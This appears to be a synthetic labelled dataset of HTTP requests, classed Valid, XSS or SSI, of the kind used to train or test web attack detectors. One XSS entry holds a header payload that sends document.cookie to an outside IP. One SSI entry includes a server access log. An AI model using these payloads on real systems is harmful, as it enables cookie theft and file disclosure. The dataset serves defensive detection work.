Host: www.snfsl.net:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: MS93a=1Ehtse
Client-ip: 41.79.231.230
Cookie: cPo0Tmnae4entnn=eeal;59D@I1U3VD8d=scriptgIsock_stream;MLSY@E.Bdz=hhghoiie
Cookie2: $Version="53"
Date: Wed, 12 Dec 07 09:33:12 GMT
ETag: "Ppyt6cEuEC9dpgF"
Expect: 100-continue
From: qeirgp@9goyD.st
If-Modified-Since: Thu, 31 May 07 19:01:43 GMT
If-Unmodified-Since: Wed, 08 Nov 06 15:17:22 CET
If-Match: *
If-None-Match: *
If-Range: "BQLzPj_@BefDs4rvHtxA"
Max-Forwards: 4
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest uri=/0naYTtga/isasndt/dhsaNs/gnre.pl
Authorization: NTLM Ym44cm9lYW9ldmh1ZDNld2xDbGNhdGRla2llSWE5dHJ0
Range: 819615-,9-2755,-87015
Referer: /grmufeia/dmsedhhr.jpg
TE: trailers
Trailer: Referer
User-Agent: 5rb8/8.4.7
UA-CPU: PowerPC
UA-Disp: 081,028,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 561x3269
Via: 9.8 www.tosseyaa.shtml, HTTP/3.5 93.255.62.239
Transfer-Encoding: pSfdSs
Upgrade: ypon/2.7, buer/1.4
Warning: 620 28.253.168.33 "eIhu" "Thu, 07 Feb 08 14:55:42 CET"
X-Forwarded-For: 7.49.87.14
X-Serial-Number: 60090044663
----: ---------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 16800
Start - Id: 21390
class: Valid
GET /ihleapo98flE/aobaed/a9c-iKW7u@p4qawNhx/tCrd.2gO0/i5XNO5uYh40.kdB@G/e6RAY@7YgswqMg/1Uhttp_P.php4?yl=hnOX37iaXB&vylTAoRh=xp_escriptwt&LhreeSeexe=gsa HTTP/1.1
Host: www.2y7tesyoh.org:80093
Connection: close
Accept: image/png;q=0.8
Accept-Charset: iso-2022-jp, iso-8859-1;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 5.177.226.179
Cookie: eisG=6;wnO=7cs
Cookie2: $Version="94"
Date: Fri, 13 Nov 09 21:26:23 UTC
ETag: W/"YppqsIHpE10pCN588"
Expect: eeoemua
From: 6nzmsEZ@elsd.cz
If-Modified-Since: Fri, 12 Mar 10 01:48:44 UTC
If-Unmodified-Since: Tue, 23 Sep 08 15:42:47 CET
If-Match: "d0KWbOJeiTS0@R55XG8"
If-None-Match: "vf335-t3NPGwdoj0C3"
If-Range: "Fr4I9QbxdXDKWkRG"
Max-Forwards: 753
MIME-Version: 7.5
Pragma: c347tfh=h
Proxy-Authorization: niiafr ve3n=esohhuo1
Authorization: NTLM YWh0dGVwZWF5bmlzd3JxOWVudGVycm41amdlZXh1T2Y=
Range: 3184-,5431-
Referer: /sm6qU/hb2ii3/SatwKnN.aspx
TE: gzip,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.4 (compatible; sebYe; SunOS sun4u; as2hee)
UA-CPU: MIPS
UA-Disp: 0248,8478,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 965x768
Via: tek/9.0 8.18.246.144, 7.4 201.223.82.98, FTP/0.9 www.ctt0.html
Transfer-Encoding: deflate
Upgrade: nme/2.8, wht/3.6, Msods/5.6, apd/5.1
Warning: 043 24.229.27.123 "ortNea7pt" 
X-Forwarded-For: 86.182.5.47
X-Serial-Number: 2418413
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 21390
Start - Id: 14720
class: Valid
GET /Yhttps7EFDP0d7F/w4ul/x3BlFJVLP3/cQUUeJ2/nU/Bestdin/nZtttL4.jpg?tcieiNa=807&bhg=3712349&dsrvAw=dwinntoEat0lel1+1a&eeairei=us8o&25Kwindow.open4aEYHkRm=zykdocument&guzd3oa=1595&OTI.=gtIf&tladwascol=ii%40q%3E%24s%28dS&c9awnd=bnD HTTP/1.1
Host: www.ucisnsp.ch
Connection: etda
Accept: text/xml;q=0.9, video/*, audio/*;q=0.9
Accept-Charset: iso-8859-15;q=0.7, koi8;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 157.235.60.81
Cookie: hcilTouGt5e=8302496301;otesttdGnein=ncd3ucn
Cookie2: $Version="6"
Date: Tue, 13 Sep 05 17:08:51 GMT
ETag: W/"CjXd5ytRG8C2ENF8MV"
Expect: oiheoS=SOre;era8=iynroe
From: zar3wadE@0eyihva.cz
If-Modified-Since: Tue, 22 Jun 04 19:50:44 GMT
If-Unmodified-Since: Wed, 27 Dec 06 10:21:04 UTC
If-Match: "2mRzzeqeEigLd.N"
If-None-Match: *
If-Range: Mon, 10 Dec 07 22:54:22 UTC
Max-Forwards: 61
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Digest uri=http://tett.ch/tulLjgt.swf
Authorization: Basic c290Y3FySjpkdFNwZUU=
Range: 07-
Referer: /ugNmaa/Laeeb/qe2e/lyttztou/ahet.php3
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/6.9 (compatible; Konqueror/5.9; Open BSD i586; Ao0bdbee)
UA-CPU: x86
UA-Disp: 733,9202,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 0368x227
Via: 6.4 21.58.186.194, HTTP/0.1 88.157.179.192
Transfer-Encoding: at6Est; wpac=yretchmm
Upgrade: isiavm/4.5, oOb/6.3
Warning: 558 www.ronb.png:85114 "eteaQlei6Imtxieuee" 
X-Forwarded-For: 99.254.129.225
X-Serial-Number: 5935364150091795
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14720
Start - Id: 16635
class: Valid
GET /te/rsitdh/9CjLaqhdcS/4GfAoNAB6S@v5S/sBf/sAYHuvK6vJBzkH/brwtiUei/zcHZ.tiff?swgmoqoesea5Eph=c1xr&emsyss=56et&niays=4&eSnu-SJaAY=oYjV&nwsDeiizelnl=2337789514&httpid3y9tPb0=%3Dc10E%40%26vnz%7C+psHr2+et HTTP/1.1
Host: 231.39.155.10
Connection: keep-alive
Accept: text/*;q=0.1, application/*;q=0.8, video/*;q=0.8
Accept-Charset: x-mac-japanese;q=0.2, koi8-r, windows-874;q=0.4, x-mac-chinesetrad, windows-1254;q=0.5
Accept-Encoding: *;q=0.6
Accept-Language: dpesr6c-hejbqdc, qm3tHU-3nieeHaa, wgOht-epdryimt, s-3r4nmbU;q=0.4, ui0iziag-ToEmc
Cache-Control: no-cache
Client-ip: 77.163.166.136
Cookie: ao=55883782;.OW_.9T0wp-TPP=tf%i;dmtg=scriptrbodyNnalibaod;Qlfe9evrmtli=fheahksfneea@t srcp6;prtaoSeogSrbe=8051
Cookie2: $Version="8"
Date: Tue, 12 Sep 06 02:13:15 UTC
ETag: "_OT7_P8378lUD59d"
Expect: 100-continue
From: NuRe@6eea.cz
If-Modified-Since: Mon, 15 Aug 05 16:41:02 GMT
If-Unmodified-Since: Sat, 12 Mar 05 15:46:18 GMT
If-Match: *
If-None-Match: *
If-Range: "2-3Esz-GgQYTCUrQfm"
Max-Forwards: 37
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: ttdia rghriOx=i1agttb
Authorization: mrmz5j ttjih=om0t4e
Range: 38173-
Referer: http://htTemdt.gov/ih7reHi.swf
TE: gzip;q=0.8
Trailer: From
User-Agent: eeaedz9z/4.2
UA-CPU: x86
UA-Disp: 4468,351,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5729x0287
Via: ebr/2.5 54.16.4.27, HTTP/1.7 92.109.116.34, 8.5 81.183.4.91
Transfer-Encoding: gzip
Upgrade: lte/0.8, ascmyo/0.4
Warning: 776 12.83.110.221:697 "intttghuuaPl" "Tue, 01 Mar 05 05:24:24 UTC"
X-Forwarded-For: 241.107.33.0
X-Serial-Number: 6104122445139965688
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 16635
Start - Id: 46576
class: XSS
GET /tF/zrim/td2xzONilQ6ghY/ZO3cR0execv/sMPX44ntelnetod5Y/cGpiUihw11oAL/n_ce_pCMKksp8/ge/einP/soho8Esysswtihlm66v/dL.html? HTTP/1.1
Host: 169.161.11.165
Connection: close
Accept: application/*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: heig6cu-nant;q=0.2, kSp-2oocesq, ssen-hekacd;q=0.3, rdosenem-Os;q=0.1, l-ner5zTqx
Cache-Control: no-store
Client-ip: 140.154.179.232
Cookie: asedevuourst=Eo;RtMeekK=po8urm6fiNacritt
Cookie2: $Version="0"
Date: Thu, 24 Feb 05 21:24:13 CET
ETag: W/"j-GvuB-Y6UUJL8q3fp"
Expect: oai0tt
If-Modified-Since: Fri, 24 Apr 09 06:47:20 CET
If-Unmodified-Since: Sun, 27 Jul 08 02:57:14 CET
If-Match: *
If-None-Match: *
If-Range: "kSAsVsy_9kJhV@IM3v"
Max-Forwards: 972
MIME-Version: 6.1
Pragma: 4naerubo='hm'
Proxy-Authorization: NTLM M2VhU3NBb25hOWZoZ2lub2NiZXQxUm50YXRzdHRUbm9lb3NtUm4=
Authorization: Digest realm
Range: 70-
Referer: http://th7nz.uk/eexie9/oHte/tiovg.pl
TE: trailers,deflate;q=0.4
Trailer: If-Match
User-Agent: <link    rel   =  "   stylesheet        "     href   ="    javascript: [window.open('http://122.246.193.64/ilsi.mspx'+document.cookie);]       ">
UA-CPU: PowerPC
UA-OS: Win98
UA-Color: color16
UA-Pixels: 5605x1554
Via: 0.2 235.45.121.98, HTTP/8.9 www.NeWl.tiff
Transfer-Encoding: gzip
Upgrade: ieek/6.0, 9suhri/7.2, tEdUn/4.8, nen3O/8.2
Warning: 179 24.207.141.105:00 "tAos9srMecair0" 
X-Forwarded-For: 222.189.31.195
X-Serial-Number: 70953324571970
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46576
Start - Id: 17146
class: Valid
GET /hfCvPJmDRUzM0/Oe9birea9tXarg9A.jsp?imIsn=ieCn9aaare1oHm3n&sx=29944&Ibwt7ursd84arg=h7LHH-tr7vy&Wsng=%26+imEth&s2evCxdlOOwsv=106714 HTTP/1.0
Host: www.iEomdnsu.uk
Connection: roFF
Accept: */*;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: deflate;q=0.5, compress;q=0.0
Accept-Language: Tbyk2Cd-uZ, tlcy4tin-rc, wl3rstsi-TeHmToos, sgi3hR-o, u0hee9D-lOR9uor;q=0.4
Cache-Control: no-cache
Client-ip: 135.104.246.43
Cookie: epetm16=eHp>escripttdr;ecrSln7aietMrc=qJ0.DNRc;he8oeohnh3neAl=t.6fLA;yqo=tdnsslnrioXhm;aaohat=p4yGWX;a0sqoce60=htegeigeo3ne'S
Cookie2: $Version="71"
Date: Sun, 05 Jun 05 17:15:20 CET
ETag: "Gro2HZyrngc6QuB6f4"
Expect: enay=eaeaur;zree8=rnnbies
From: gcEsmc@smae.st
If-Modified-Since: Thu, 13 Mar 08 14:22:08 CET
If-Unmodified-Since: Sat, 04 Feb 06 19:07:10 GMT
If-Match: "LSWMKGH-4PPWMG2zH"
If-None-Match: *
If-Range: Thu, 28 Jul 05 03:56:41 CET
Max-Forwards: 2
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWw1YzF0U1RkcmVlWnB5aGhpbzJOZXdQbGlkU29ucm9s
Authorization: o8tEr itjea=ewTaLf
Range: 6398-,1074-5081,99-87016
Referer: http://www.7lSce.be/veyloobP/ohck/itet/fttNadei/dAaf.mpeg
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: elBdoz2/6.8.9
UA-CPU: StrongARM
UA-Disp: 817,8711,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0887x1006
Via: FTP/1.9 53.29.215.177, 3.7 www.Eooc5ma.shtml, 3.8 www.orrrpf8.shtml
Transfer-Encoding: gzip
Upgrade: wbigqt/6.4, hv08se/7.5, ses/3.0, iei/9.4, n6vl/4.7
Warning: 884 66.52.11.38 "buetRO9tneeajg1yc" 
X-Forwarded-For: 125.81.27.179
X-Serial-Number: 92445
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17146
Start - Id: 1541
class: Valid
GET /OVArICDoMpnX_y/arsse8mhatWoie/dbmtientyzamrl2/eneIu0hEum4auhvgb6/2.iZS.aK-/wsirbsnto/oTOYlO7kUmmails/nakvOhnt/t7k31pPvkr5HF9YjHE/yO/e6D6ebI_ywLHP7.swf? HTTP/1.0
Host: www.Ereherhl.uk
Connection: s6ee
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: deflate
Accept-Language: uafttv-tns, tr-4oeDh
Cache-Control: no-store
Client-ip: 185.157.234.182
Cookie: a457fIuTtoh1=ha-Jg3UU
Cookie2: $Version="380"
Date: Sat, 17 Apr 10 13:47:45 UTC
ETag: "04JB4gAQEilyGwNW6"
Expect: 100-continue
From: uared@sesbwap.com
If-Modified-Since: Mon, 05 Oct 09 22:29:04 CET
If-Unmodified-Since: Sun, 03 Jun 07 01:44:45 UTC
If-Match: "qgWHQmAZXI3lc5ur"
If-None-Match: "9CfJ1PW.IrJ@H-Ks9B"
If-Range: "adA74QmOTo-MH.cQPx-G"
Max-Forwards: 8
MIME-Version: 5.1
Pragma: tfun7ahu=doxne
Proxy-Authorization: Basic ZW9tTUFzZTplcGFo
Authorization: Digest algorithm=MD5
Range: 217-7,6387-6
Referer: /0uoenuv/ezglnip0.jsp
TE: gzip,gzip,trailers
Trailer: From
User-Agent: yM7YrWF http://www.elhngel.org
UA-CPU: PowerPC
UA-Disp: 422,3598,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 7934x8697
Via: 8.0 www.80tLL.shtml, 2.6 165.168.107.92:2
Transfer-Encoding: deflate
Upgrade: ane/0.8, d9tm/6.0, t3eu/5.9, itbhTr/3.7
Warning: 172 www.gicpsf4l.css "oo512" "Thu, 06 Jul 06 16:00:23 UTC"
X-Forwarded-For: 223.124.189.8
X-Serial-Number: 2858071636366715430
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1541
Start - Id: 26847
class: Valid
GET /v3m/r--O13S7oj2fP7biYOm2/tlneat9w/ctabaocaRetaliaaiieh/as4C/Rrl4ra/wweoqtaito/iXoISnl5PfIyq1.mkL/ThemelDrtassE5h0eea/i4eierg8llto4aedgmt.css?crkSehiisOvsL=1276884&r7u.9XLm=nycHzw&@Ur1Sy=8658419&noeonrfi=21276&ugHh1dot=1nehsbshutdown%24%3AOpassthru30tiaofce&5mochalinkM=vbscriptxmlfra25%5Cszrecmdeit%3C&SagAZ35=a HTTP/1.0
Host: www.sSugoet.fr:80
Connection: close
Accept: application/zip, audio/*
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 52.105.65.98
Cookie: 9hacceptqTnc8o7KN=0d;dNtgnsaal=-link8my ht]imgit >:/;mtoDzris0eOaw=dgbgsoundrne;eapOts7crNa=3807752
Cookie2: $Version="375"
Date: Wed, 29 Sep 04 08:09:08 CET
ETag: "kQ2DhIHtfA0kF3cW"
Expect: narnunp=svtEad
From: vteseoi@repl.biz
If-Modified-Since: Mon, 29 Mar 10 12:04:55 CET
If-Unmodified-Since: Wed, 26 Apr 06 12:43:54 CET
If-Match: *
If-None-Match: "Kl7OL_vM0L@HbWjE"
If-Range: Sat, 29 Apr 06 03:04:36 UTC
Max-Forwards: 2
MIME-Version: 8.4
Pragma: odekNthr='mt4degi2'
Proxy-Authorization: NTLM ZnVuc05kbGRnSGVudmF0YjdzYmhsbmVhYXFlbTFudHRvbGpibWxrbHpwdG1FZWk=
Authorization: NTLM aW90ZWlha3RvcnB6bmlhcGVWdGZtZVNIdGlUOXplZ250
Range: -6214
Referer: /rtnees/Nsebs/nesw/ts3ot.exe
TE: deflate,deflate,chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/0.6 (Windows; U; Win 9x 6.3; bf-ia; rv:4.0.6) Gecko/65779508
UA-CPU: StrongARM
UA-Disp: 1462,2709,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9604x4951
Via: nErcoo/5.4 www.sNoTf0.css, HTTP/9.2 19.85.61.30, eci/0.5 153.54.29.212
Transfer-Encoding: gzip
Upgrade: advoos/2.4, 1dhv/7.1
Warning: 297 232.19.117.132 "aetandso7efov4gNl" "Sat, 20 Dec 08 21:57:39 UTC"
X-Forwarded-For: 225.193.121.240
X-Serial-Number: 333154589
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26847
Start - Id: 39755
class: SSI
GET /is3qqz0e9gpciace/oo9wibeiKetwphiN.html?fGHlISF=gu%24beoD7TR&defea=6947095&LTvvp7qZeT=%3C%21--%23include++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22++++--%3E&nie7h=saI&4qwfj5=576&saynwt=coheaNrifroa1b4j&2optoyaebn5p=crtdaNm&dwyeni6ohLt=ait27&0tAarren0=4380853&mkW3C8p=ao6tljotTjgqttda HTTP/1.1
Host: 42.254.164.216
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: identity;q=0.5
Accept-Language: p-k;q=0.5, o-eotfk;q=0.1, R0holR7-dtr6;q=0.2, 9eftr-r
Cache-Control: a=s2i
Client-ip: 122.119.15.78
Cookie: 8i= ;6obmmIntzRm= \1-ingm;thtanemtlxesl=4
Cookie2: $Version="098"
Date: Sun, 28 Oct 07 06:51:17 UTC
ETag: W/"T6v1gOR1o6OyhoM"
Expect: 7atT=ybaN
From: ls8tIstr@r3edte.de
If-Modified-Since: Tue, 15 Mar 05 16:54:34 CET
If-Unmodified-Since: Fri, 31 Dec 04 10:08:36 CET
If-Match: *
If-None-Match: "Sxgz__kQ-nNDn4X6yIs"
If-Range: *
Max-Forwards: 0601
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest algorithm=rOwsg8ds
Authorization: lO6Soh rrse=ltmytu8
Range: 85-,34121-
Referer: /phrpsh/srNrKetr/a5mtaoe/ue8s/5eate.php4
TE: trailers,trailers,gzip;q=0.9
Trailer: Date
User-Agent: Mozilla/4.4 (X11; U; Unix 3.4; hn-ra; rv:4.3.0) Gecko/01754523
UA-CPU: 68000
UA-Disp: 377,8023,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 5615x413
Via: 6.4 224.169.35.54
Transfer-Encoding: identity
Upgrade: Lweoe/6.3, rgr/6.8, e3sni/8.6, oade/5.4, laewl/3.5
Warning: 205 www.oith.gif:14611 "vu8fShfdar5iamtid4" 
X-Forwarded-For: 141.175.190.115
X-Serial-Number: 37299896
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39755
Start - Id: 19427
class: Valid
GET /TSrzR6se/yXAbZ8kfwBO/likew1.8xusrw/oNCbgsound/H5cunionQO6du@./YSNcATvLrw.ph0N/zrevalcxFwautoexec6QpkZ/vOeeaxsosrsseNsn.htm?raitmtegtue=aAeoi&S6tmnyne=italle6Tiwp-0jh&g@YlogpasswdeQzmfL=Anz4bgsoundAnE1yeHae&aaRe=06999942&nklrStpaac=np%28dperloib&irrrnnheprxpny=2084725&ae27ftiwdtls=%40e&eesteaseti=nyaesCz.dKX9&WXsvAaccess_logYJv@=8739772172&iha=%3FenlF4e%3C%26d%26 HTTP/1.0
Host: 201.76.20.12:3130
Connection: rsulpx
Accept: */*;q=0.9
Accept-Charset: euc-cn;q=0.1, iso-8859-5;q=0.6, cp-950;q=0.9, x-mac-hebrew;q=0.0
Accept-Encoding: *;q=0.0
Accept-Language: hyla-Iudnn, zrcerlae-ort9m7oi;q=0.0, e-eoslf, F-edaInn
Cache-Control: max-age=85
Client-ip: 168.104.135.23
Cookie: opnrnehmoooeSh=d1;Jn9Eprpasswda=s@P1-JuM3J
Cookie2: $Version="62"
Date: Tue, 19 Dec 06 07:03:29 CET
ETag: "XSqNFsTYOL9p3v-0N"
Expect: 100-continue
From: t3oorme8@tdteu5l3.it
If-Modified-Since: Fri, 04 Nov 05 24:00:03 GMT
If-Unmodified-Since: Wed, 22 Dec 04 04:04:24 GMT
If-Match: "OAOiUisldTKL0o5MS"
If-None-Match: *
If-Range: Tue, 27 Mar 07 18:01:58 CET
Max-Forwards: 40
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: NTLM ZGlhaUwyaG50aWxUczdoOWVsdGFmaGpmdGFvb2xiUzlaYWR0dE9sOXR0
Authorization: NTLM c29lbm9qb2N0b2VibTUxb3drcmVzeGR1b2g0aW42RXVhb2psaWljZGhOYXRx
Range: -2,6-20086
Referer: http://alrue.org/ueOl/i6ol.aspx
TE: deflate,trailers,chunked
Trailer: Date
User-Agent: en75 (2@gBLy7)
UA-CPU: x86
UA-Disp: 984,861,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 6070x723
Via: 9.9 www.UAdrz.htm, 1.4 www.egpslet1.html, 7.4 www.pl3zf.htm
Transfer-Encoding: identity
Upgrade: 3tDr/0.3, octa/6.4
Warning: 817 www.dgMhdl.css "coacOilhor" 
X-Forwarded-For: 6.252.77.179
X-Serial-Number: 312709516539
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19427
Start - Id: 19075
class: Valid
GET /Qjeeordneewltsdnns9/mGwLiass7oit/tmf_LoH4tB2NqDTio/ZFvbscript8AEab-Bv9b/eerdaeneautt7elSt.jpeg? HTTP/1.0
Host: 223.106.36.255:04
Connection: air7mnq
Accept: */*
Accept-Charset: iso-8859-5;q=0.8, iso-8859-15;q=0.0, us-ascii, cp-950
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-age=44
Client-ip: 222.183.198.147
Cookie: ntifee=6194130;ehnodsbnsu==eaIn(iaexecy7+libwe61E;txeee1hatCge=m1UV07;9XMLHQJ=sieeuh;ecttOf9Alr4wb=hsVRwcmOZSJ
Cookie2: $Version="27"
Date: Sat, 23 Feb 08 21:56:43 GMT
ETag: W/"lGyFmsGG_GC7-HnK"
Expect: 100-continue
From: jgqen@7tosiu.st
If-Modified-Since: Fri, 15 Aug 08 03:44:22 UTC
If-Unmodified-Since: Mon, 24 Dec 07 22:04:20 GMT
If-Match: "fiRXI_qr84g-76W@oJ1"
If-None-Match: *
If-Range: Sun, 11 Jun 06 19:24:49 GMT
Max-Forwards: 45
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: NTLM NHBwdDFldGVlaXQxbm1nb3J0SXRobnlubnRyczV0ckFobmhlYQ==
Authorization: Basic a2VtbTplcmlhc3R0
Range: -98,0008-41,92-
Referer: /AegO/eeafpd/a0pISs.jpeg
TE: gzip;q=0.0
Trailer: Date
User-Agent: mHM5HMt http://www.o7slS8.com
UA-CPU: MIPS
UA-Disp: 603,8155,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 019x039
Via: HTTP/1.9 www.hpaNuub.gif, 2.1 102.122.7.12, n3edzr/2.4 88.74.187.240
Transfer-Encoding: compress
Upgrade: mTec5/5.9, iRo/8.2, 5e5e/7.4
Warning: 342 204.151.63.29 "ebtn0ofEoku" "Fri, 09 Oct 09 08:23:52 CET"
X-Forwarded-For: 203.182.207.188
X-Serial-Number: 594077
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 19075
Start - Id: 18536
class: Valid
GET /fhv5b8F2PvNGTd/B1iframeq3EW/tzZ0H-ktSJ7xc6KV/sqbCW7oJKNOg/hfcjCYrID/hbT_PUPN0wjGiw/Bimg/tepso.aspx?f1Awesdviapn3tg=4085&dejoasEhstx=e&lniuteiaun=8t3ftp HTTP/1.1
Host: www.wc2h4Ea8.ch
Connection: keep-alive
Accept: application/*;q=0.3
Accept-Charset: iso-8859-6;q=0.3, iso-8859-8-i;q=0.6
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: max-stale=191
Client-ip: 26.16.70.98
Cookie: 7xgcb=rlhN2passwdgriN3i;O-TaQ_NAC=89561;ioEurzlaShIewih=?
Cookie2: $Version="801"
Date: Sun, 27 Aug 06 19:01:06 CET
ETag: "Kk6.ES3XN1t4fbLXH"
Expect: 100-continue
From: x0tmarT@bobht4e.cz
If-Modified-Since: Wed, 03 Oct 07 04:35:33 CET
If-Unmodified-Since: Tue, 19 Jan 10 18:46:00 UTC
If-Match: *
If-None-Match: "mtNyy1ems-qUZ0TyKaM"
If-Range: Thu, 18 Mar 10 11:33:45 GMT
Max-Forwards: 9065
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Basic ZTByZTpzYVR1aWk=
Authorization: Basic dG5scmlpOjN5ZW5hVGF1
Range: -3
Referer: /2unrwavi.js
TE: gzip;q=0.0
Trailer: Trailer
User-Agent: Mozilla/0.5 (Machintosh; U; Mac OS X 3.8; cg-9c; rv:8.9.7) Gecko/19767948
UA-CPU: Sparc
UA-Disp: 973,9699,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 2222x203
Via: 0.9 www.seehlu.tiff
Transfer-Encoding: compress
Upgrade: ita/7.2, nie/4.6, 5ilm/2.3
Warning: 418 www.f0trQd.shtml "iseqw0oHr" 
X-Forwarded-For: 81.60.123.231
X-Serial-Number: 4260259016385
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18536
Start - Id: 11453
class: Valid
GET /eLYJN2kyp6eiTHk0Lo.tiff? HTTP/1.0
Host: www.tIeama6.uk:80
Connection: keep-alive
Accept: application/*;q=0.2, video/*
Accept-Charset: euc-kr;q=0.5, iso-8859-9;q=0.0
Accept-Encoding: *
Accept-Language: ys-thiat
Cache-Control: hs='olkdmn'
Client-ip: 77.130.19.103
Cookie: hejduu=OnTg8zgqnpelt7eOv;dohhxehianeac=l;dagamrseenoDl=Se\si7ope" =sock_stream"pkh
Cookie2: $Version="36"
Date: Fri, 20 May 05 03:10:58 UTC
ETag: W/"R51MOFyEAdg@_kqyEB"
Expect: 100-continue
From: ezBfko@fesnitr.uk
If-Modified-Since: Sat, 18 Jul 09 14:43:15 UTC
If-Unmodified-Since: Thu, 10 Feb 05 17:32:19 GMT
If-Match: "HDaUtZ-ZbCs6MAkxc8S"
If-None-Match: *
If-Range: "UIkuW_se5Vk@qx5KzD"
Max-Forwards: 459
MIME-Version: 2.9
Pragma: nOindo=fnahSoe
Proxy-Authorization: Digest algorithm=MD5
Authorization: NTLM bnJlcnR2bm5lSTJscXNlb29obG13VGhBcmNpaW90ZTdsMHJlZQ==
Range: 586-9658,-194
Referer: http://www.rC3euC.it/svYint/baxhmtl/nxswewrs.aspx
TE: trailers,trailers,trailers
Trailer: From
User-Agent: g0tub1uVh (iRqGJvfGw)
UA-CPU: Sparc
UA-Disp: 9055,045,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 514x0544
Via: owrl/4.2 www.aejmnt6e.htm
Transfer-Encoding: gzip
Upgrade: csih/5.7
Warning: 907 www.lxlrE.htm "iLeehceeken" "Wed, 25 Jul 07 20:19:51 GMT"
X-Forwarded-For: 50.198.56.130
X-Serial-Number: 0375108727
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11453
Start - Id: 29492
class: Valid
GET /rttnastq2uraB83yo3e/w2y@iiboot.ini/cbt/ttm/ofl/moTetckubt92tl6sr.exe?ttt7X0=35556&JW8os3stylebuunP=Imjaoui1&lirRa=wX2F%40Bs&QxmlVGm@t=hJML&tatibpSse=iiLa%299to&jbtbpiox402g=o%3Bntrivarhhttimgz&WXF3locationSkT=o%25Vi&Aa64lsedror=4479499&w0a44sAsbiisd=wh1ier&uipuHeoH=haf HTTP/1.0
Host: 19.190.30.173:80
Connection: close
Accept: image/png, video/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 12.169.110.212
Cookie: qan4e=9ai'n;Ss4birEeentdQb=hw90rMK9SPK5;skneieOgtm=ol
Cookie2: $Version="626"
Date: Wed, 29 Mar 06 21:27:40 UTC
ETag: "ubmAsu7uN5ZDkYf9"
Expect: 100-continue
From: hnoyso@ioJaegaa.st
If-Modified-Since: Sun, 24 Jun 07 24:58:27 GMT
If-Unmodified-Since: Mon, 23 Aug 04 21:44:30 CET
If-Match: "boE8VfV65i-q3Qd6uOJ"
If-None-Match: "MbmAiwYg2ali60hBmVFR"
If-Range: Fri, 12 Jun 09 10:19:06 UTC
Max-Forwards: 573
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: 40goe uren9esp=e5th
Authorization: e2sl hebggrp=shcoOps
Range: 6551-
Referer: http://www.2aa0h.biz/hyqiuaed/xn9gw/ridEiwwr/ne3an/em8ty8q.tiff
TE: chunked,gzip;q=0.7,trailers
Trailer: Host
User-Agent: Mozilla/1.9 (Windows; U; Windows NT 2.5; oc-pd; rv:8.5.0) Gecko/01052722
UA-CPU: Sparc
UA-Disp: 103,9341,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 522x597
Via: 3.8 www.le2ii.htm, 8.4 www.oerozs.htm
Transfer-Encoding: ewow
Upgrade: nene/2.6
Warning: 270 101.148.72.64:95 "i8edoTSEtsz" "Wed, 28 Dec 05 21:22:16 CET"
